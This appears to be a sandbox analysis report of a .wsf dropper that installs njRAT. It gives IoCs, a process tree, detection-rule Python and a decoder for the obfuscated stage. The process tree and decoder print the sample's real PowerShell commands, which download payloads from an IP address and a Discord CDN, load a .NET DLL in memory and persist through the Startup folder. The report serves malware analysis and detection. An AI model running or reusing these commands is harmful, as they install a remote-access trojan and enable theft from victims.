Analysis
max time kernel: 146s
max time network: 155s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22/09/2022, 19:00
Static task: static1
Behavioral task: behavioral1
Sample: e4fbe2c0de215885d004f354f1e57357.wsf
Resource: win7-20220812-en

General
Target: e4fbe2c0de215885d004f354f1e57357.wsf
Size: 53KB
MD5: e4fbe2c0de215885d004f354f1e57357
SHA1: 258f167a93a3f51fee1e05f6d401661b5ea63bd3
SHA256: ce6cdc61e1758c5abd949a017475171aea3dbd9571d45300990badd6006759c4
SHA512: a3c1c60d641226aef13be04eda4c3e30e8a0b658e5bae65b4b3a7beba692dd57e63e5d451169d10e2f535414855be26767657ca6e08164e9f609e7f74f749023
SSDEEP: 192:L48w8Nlb0bqGW6CCCuqpS848w8Nlb0bqGW6CCCuqpd48w8Nlb0bqGW6CCCuqpJ:dwSb0cJqiwSb0cJzwSb0cJR
Malware Config

Extracted
  URL: http://5.42.199.120/dll/lannodll.txt

Extracted
  Family: njrat
  Version: 0.7NC
  Botnet: NYAN CAT
  C2: wins2109ok.duckdns.org:8000
  Mutex: cfe0aa9d35c
  Attributes:
    reg_key: cfe0aa9d35c
    splitter: @!#&^%$
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  6     3068  powershell.exe
  14    1564  powershell.exe
  15    1564  powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence check.
  description        ioc                                                                                                    Process
  Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  WScript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  WScript.exe

Drops startup file (2 IoCs)
  description                   ioc                                                                                       Process
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs  powershell.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs  powershell.exe

Suspicious use of SetThreadContext (1 IoC)
  description                          pid   Process         procid_target
  PID 1564 set thread context of 2356  1564  powershell.exe  90

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The generic signature text flags this as likely ransomware behaviour; with an njRAT payload, which can spread through removable drives, drive enumeration is the more plausible reading, and no file-encryption activity is recorded elsewhere in this report.

Modifies registry class (1 IoC)
  description  ioc                                                                                 Process
  Key created  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings  explorer.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid   Process         count
  3068  powershell.exe  2
  2776  powershell.exe  2
  1564  powershell.exe  2

Suspicious use of AdjustPrivilegeToken (36 IoCs)
  Token                                        pid   Process         count
  SeDebugPrivilege                             3068  powershell.exe  1
  SeDebugPrivilege                             2776  powershell.exe  1
  SeDebugPrivilege                             1564  powershell.exe  1
  SeDebugPrivilege                             2356  CasPol.exe      1
  33 (raw LUID; SeIncreaseWorkingSetPrivilege) 2356  CasPol.exe      16
  SeIncBasePriorityPrivilege                   2356  CasPol.exe      16
The 33 / SeIncBasePriorityPrivilege entries alternate in the raw list; the report prints privilege 33 by its LUID value rather than by name. All three PowerShell stages enable SeDebugPrivilege, which the final stage needs to write into and redirect CasPol.exe.

Suspicious use of WriteProcessMemory (18 IoCs)
  source pid  source Process  target pid  procid_target  count
  4520        WScript.exe     3068        79             2
  3068        powershell.exe  4920        81             2
  2084        explorer.exe    1360        83             2
  1360        WScript.exe     2776        84             2
  2776        powershell.exe  1564        88             2
  1564        powershell.exe  2356        90             8
Two writes per parent/child pair accompany ordinary process creation in this telemetry. The eight writes from powershell.exe 1564 into CasPol.exe 2356, combined with the SetThreadContext call on the same target listed above, are the process-hollowing / thread-hijack pattern: the .NET loader stage spawns CasPol.exe as a host, writes the payload into it, and redirects a thread to the injected code.
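The tables above give everything a detection engineer needs: a parent/child chain, memory-access pairs and a file drop. The following Python is an added example (not part of the report and not the sandbox's own logic) that shows how those facts become rules. The event records are constructed from the PIDs, images and command lines in this report; Sysmon-style field names, the abbreviated command lines, the list of .NET hosts and the rule names are assumptions. The rules flag a script host spawning hidden or downloading PowerShell, PowerShell handing a script to explorer.exe, the resulting script host appearing under a DCOM-activated explorer.exe, WriteProcessMemory plus SetThreadContext into a .NET utility, and a script dropped in the Startup folder.

```python
import re
from collections import Counter

# Constructed event records assembled from the PIDs, images and command lines
# this report lists (Sysmon-style field names; long command lines abbreviated
# with "..."). This is not raw sandbox telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\WScript.exe"
EXPLORER = r"C:\Windows\explorer.exe"

PROC_CREATE = [
    {"pid": 4520, "ppid": None, "image": WSCRIPT,
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4fbe2c0de215885d004f354f1e57357.wsf"'},
    {"pid": 3068, "ppid": 4520, "image": PS,
     "cmd": r"""powershell.exe -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1022146310729650249/1022278336447262750/Crpted55.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;..."""},
    {"pid": 4920, "ppid": 3068, "image": EXPLORER,
     "cmd": r'"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs'},
    {"pid": 2084, "ppid": None, "image": EXPLORER,
     "cmd": r"C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding"},
    {"pid": 1360, "ppid": 2084, "image": WSCRIPT,
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"'},
    {"pid": 2776, "ppid": 1360, "image": PS,
     "cmd": r"""powershell.exe -command $iUqm = '...';$OWjuxDt = [system.Text.Encoding]::Unicode.GetString([system.Convert]::FromBase64String($iUqm.replace('凸凸凸','U')));powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxDt"""},
    {"pid": 1564, "ppid": 2776, "image": PS,
     "cmd": r"""powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';...DownloadString('http://5.42.199.120/dll/lannodll.txt')..."""},
    {"pid": 2356, "ppid": 1564, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
     "cmd": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"'},
]

# (source pid, target pid, API), from the WriteProcessMemory and SetThreadContext tables
MEM_ACCESS = (
    [(4520, 3068, "WriteProcessMemory")] * 2
    + [(3068, 4920, "WriteProcessMemory")] * 2
    + [(2084, 1360, "WriteProcessMemory")] * 2
    + [(1360, 2776, "WriteProcessMemory")] * 2
    + [(2776, 1564, "WriteProcessMemory")] * 2
    + [(1564, 2356, "WriteProcessMemory")] * 8
    + [(1564, 2356, "SetThreadContext")]
)
# (pid, path), from the "Drops startup file" table
FILE_CREATE = [(1564, r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs")]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1)\b", re.I)
DOWNLOADER = re.compile(r"windowstyle\s+hidden|wget|invoke-webrequest|downloadstring|frombase64string", re.I)
# .NET utilities commonly used as injection hosts (assumed list)
DOTNET_HOSTS = {"caspol.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe", "aspnet_compiler.exe"}
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(procs, mem, files):
    """Return (rule, pid...) tuples for every event that matches a rule."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        img, cmd = basename(p["image"]), p["cmd"]
        # Script host launching PowerShell that hides its window or downloads/decodes
        if img == "powershell.exe" and pimg in SCRIPT_HOSTS and DOWNLOADER.search(cmd):
            findings.append(("script_host_spawns_downloader_powershell", p["pid"]))
        # PowerShell hands a script file to explorer.exe instead of running it itself
        if img == "explorer.exe" and pimg == "powershell.exe" and SCRIPT_EXT.search(cmd):
            findings.append(("powershell_launders_script_via_explorer", p["pid"]))
        # The script host then shows up under the DCOM-activated explorer.exe, not under PowerShell
        if (img in SCRIPT_HOSTS and pimg == "explorer.exe"
                and "-embedding" in parent["cmd"].lower() and re.search(r"\\temp\\", cmd, re.I)):
            findings.append(("script_host_under_dcom_explorer", p["pid"]))
    # Hollowing: writes into a target plus SetThreadContext on the same target.
    # The two writes a parent makes into a fresh child never fire this on their own.
    writes = Counter((s, t) for s, t, api in mem if api == "WriteProcessMemory")
    for s, t, api in mem:
        if api == "SetThreadContext" and writes[(s, t)] and basename(by_pid[t]["image"]) in DOTNET_HOSTS:
            findings.append(("hollowing_into_dotnet_host", s, t))
    # Script persistence via the per-user Startup folder
    for pid, path in files:
        if STARTUP_DIR in path.lower() and SCRIPT_EXT.search(path):
            findings.append(("script_dropped_in_startup", pid))
    return findings


if __name__ == "__main__":
    for finding in detect(PROC_CREATE, MEM_ACCESS, FILE_CREATE):
        print(finding)
```

The explorer.exe rule pair is the important one for this sample: the launch of WScript.exe 1360 is invisible to any rule that only looks at PowerShell's direct children, so the two sides of the hand-off have to be matched on the script path.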
Processes

Tree 1, rooted at the submitted script:

  [1] C:\Windows\System32\WScript.exe (PID 4520)
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4fbe2c0de215885d004f354f1e57357.wsf"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3068)
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1022146310729650249/1022278336447262750/Crpted55.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('حتمذمیص.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.wsf');Start-Sleep 1;rm *.vbs,*.wsf
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [3] C:\Windows\explorer.exe (PID 4920)
          "C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs

Tree 2, rooted at the DCOM-activated explorer.exe that receives the hand-off:

  [1] C:\Windows\explorer.exe (PID 2084)
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      - Modifies registry class
      - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\WScript.exe (PID 1360)
        "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory

      [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2776)
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE4AWQBnAE8AeABSAF凸凸凸A凸凸凸AAlACcAOwBbAEIAeQB0AG凸凸凸AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG凸凸凸AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA凸凸凸wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG凸凸凸AdAAuAFcAZQBiAEMAbABpAG凸凸凸AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA凸凸凸wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADEAOQA5AC4AMQAyADAALwBkAGwAbAAvAGwAYQBuAG4AbwBkAGwAbAAuAHQAeAB0ACcAKQApADsAWwBzAHkAcwB0AG凸凸凸AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH凸凸凸ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG凸凸凸AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAwADAAMAA4AGsAbwA5ADAAMQAyAC8AOAA0ADgAMwA0ADkAMwAzADcAMAA2ADgAOAAyADkAMQAyADAAMQAvADEANwA1ADMANQAwADcAMgA4AD凸凸凸ANgA2ADcAMgA5ADEAMgAwADEALwBzAHQAbgBlAG0AaABjAGEAdAB0AGEALwBtAG8AYwAuAHAAcABhAGQAcgBvAGMAcwBpAGQALgBuAGQAYwAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC0GKgZFBjAGRQbMBj凸凸凸GJwAgACkAKQA=';$OWjuxDt = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('凸凸凸','U') ) );$OWjuxDt = $OWjuxDt.replace('%NYgOxRUP%', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxDt
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

        [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1564)
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://5.42.199.120/dll/lannodll.txt'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.0008ko9012/8483493370688291201/1753507285667291201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'حتمذمیص' ))"
            - Blocklisted process makes network request
            - Drops startup file
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

          [5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe (PID 2356)
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              - Suspicious use of AdjustPrivilegeToken

Three points about this tree matter in practice. First, stage 2 (PID 3068) does not run the downloaded nLeNPdi.vbs itself: it passes the path to explorer.exe, which hands the file to the shell, and the script host that actually executes it (WScript.exe 1360) is parented by the DCOM-activated explorer.exe 2084 (/factory ... -Embedding), not by PowerShell. A rule that only watches powershell.exe spawning wscript.exe misses the hand-off; correlating on the path C:\Windows\Temp\nLeNPdi.vbs links the two trees. Second, stage 3 (PID 2776) carries its payload as base64 of UTF-16LE text with every 'U' replaced by '凸凸凸', then restores the 'U's and swaps the placeholder %NYgOxRUP% for the dropped VBS path before launching stage 4; the decoded text is exactly the stage-4 command line shown for PID 1564. Third, stage 4 fetches a base64-encoded .NET assembly from http://5.42.199.120/dll/lannodll.txt, loads it in-process and calls xKvKkuNZ.UGlymzUg.UDsSiDbb with three arguments: a reversed next-stage URL, the VBS path, and the name حتمذمیص used for the Startup file. The report attributes the Startup drop, the eight WriteProcessMemory calls and the SetThreadContext call to this process, so the loaded assembly is what injects into CasPol.exe 2356. The misspelling -ExecutionPolicy Bypss is the sample's own and is reproduced unchanged; it did not stop the stage from running.
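The stage-3 command line above unpacks stage 4 with three string operations: replace '凸凸凸' with 'U', base64-decode, read the bytes as UTF-16LE, then substitute the placeholder %NYgOxRUP% with the dropped VBS path. The following Python is an added example, not code from the report or from the sample, that reproduces that decoding offline on the blob copied from the report and extracts the indicators an analyst wants from the result: the DLL URL, the reversed next-stage URL passed as the first Invoke argument, the .NET type and method used as the entry point, and the Startup file name. The function names and regular expressions are mine; the input is the report's own string.

```python
import base64
import re

# Obfuscated stage-3 string ($iUqm), copied verbatim from the report's process tree.
OBFUSCATED = "JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE4AWQBnAE8AeABSAF凸凸凸A凸凸凸AAlACcAOwBbAEIAeQB0AG凸凸凸AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG凸凸凸AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA凸凸凸wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG凸凸凸AdAAuAFcAZQBiAEMAbABpAG凸凸凸AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA凸凸凸wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADEAOQA5AC4AMQAyADAALwBkAGwAbAAvAGwAYQBuAG4AbwBkAGwAbAAuAHQAeAB0ACcAKQApADsAWwBzAHkAcwB0AG凸凸凸AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH凸凸凸ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG凸凸凸AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAwADAAMAA4AGsAbwA5ADAAMQAyAC8AOAA0ADgAMwA0ADkAMwAzADcAMAA2ADgAOAAyADkAMQAyADAAMQAvADEANwA1ADMANQAwADcAMgA4AD凸凸凸ANgA2ADcAMgA5ADEAMgAwADEALwBzAHQAbgBlAG0AaABjAGEAdAB0AGEALwBtAG8AYwAuAHAAcABhAGQAcgBvAGMAcwBpAGQALgBuAGQAYwAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC0GKgZFBjAGRQbMBj凸凸凸GJwAgACkAKQA="
FILLER, FILLER_SUB = "凸凸凸", "U"      # the loader's own replace('凸凸凸','U')
PLACEHOLDER = "%NYgOxRUP%"             # swapped for the dropped script's path
DROPPED_VBS = r"C:\Windows\Temp\nLeNPdi.vbs"


def deobfuscate(blob, filler=FILLER, sub=FILLER_SUB):
    """Undo the filler substitution, base64-decode, and read the bytes as
    UTF-16LE, which is what [Text.Encoding]::Unicode.GetString does."""
    return base64.b64decode(blob.replace(filler, sub), validate=True).decode("utf-16-le")


def quoted_args(cmd):
    """All single-quoted PowerShell literals, in order of appearance."""
    return re.findall(r"'([^']*)'", cmd)


def extract_urls(cmd):
    """Plain URLs, plus quoted literals that become URLs when reversed:
    the sample passes its next-stage URL backwards to defeat a naive grep."""
    urls = re.findall(r"https?://[^\s'\"()]+", cmd)
    urls += [a[::-1] for a in quoted_args(cmd) if re.match(r"https?://", a[::-1])]
    return urls


def stage_summary(blob=OBFUSCATED, dropped=DROPPED_VBS):
    """Decode the blob the way stage 3 does and pull out the indicators."""
    cmd = deobfuscate(blob).replace(PLACEHOLDER, dropped)
    entry = re.search(r"GetType\('([^']+)'\)\.GetMethod\('([^']+)'\)", cmd)
    args = quoted_args(cmd)
    return {
        "command": cmd,
        "urls": extract_urls(cmd),
        "entrypoint": entry.groups() if entry else None,  # (type, method) in the downloaded DLL
        "startup_name": args[-1],                          # last Invoke argument
    }


if __name__ == "__main__":
    summary = stage_summary()
    print(summary["command"])
    for key in ("urls", "entrypoint", "startup_name"):
        print(key, "=", summary[key])
```

Running it reproduces the stage-4 command line exactly as the report shows it for PID 1564, and the reversed first argument resolves to a second cdn.discordapp.com attachment named 2109ok8000.txt, which lines up with the njRAT C2 wins2109ok.duckdns.org:8000 in the extracted config.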
Downloads

Download 1
  Filesize: 3KB
  MD5: f41839a3fe2888c8b3050197bc9a0a05
  SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
  SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
  SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download 2
  Filesize: 64B
  MD5: 235a8eb126d835efb2e253459ab8b089
  SHA1: 293fbf68e6726a5a230c3a42624c01899e35a89f
  SHA256: 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
  SHA512: a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download 3
  Filesize: 1KB
  MD5: 4aaea8e990963328115bd59dee2bcda8
  SHA1: 2d7eed0a0a898811d6a149a4545ab3732477c01a
  SHA256: d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc
  SHA512: de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50

Download 4
  Filesize: 153KB
  MD5: a0fa641e1fe743aa44d0b42c25243143
  SHA1: 5db55be1cbe8e19f55671e18ca2741e9a5d61c48
  SHA256: 3e2e52d83f938c4bbe67d9369bb29866153ecc846aa7e9761e73dbfaa8a26041
  SHA512: e3f103df2bdc9590e738141159da75d63b9e61e60c85df689986157339641761c2269dd29fdbdea8838eaeec8c2569320682501a2df019f08222c8489110de4d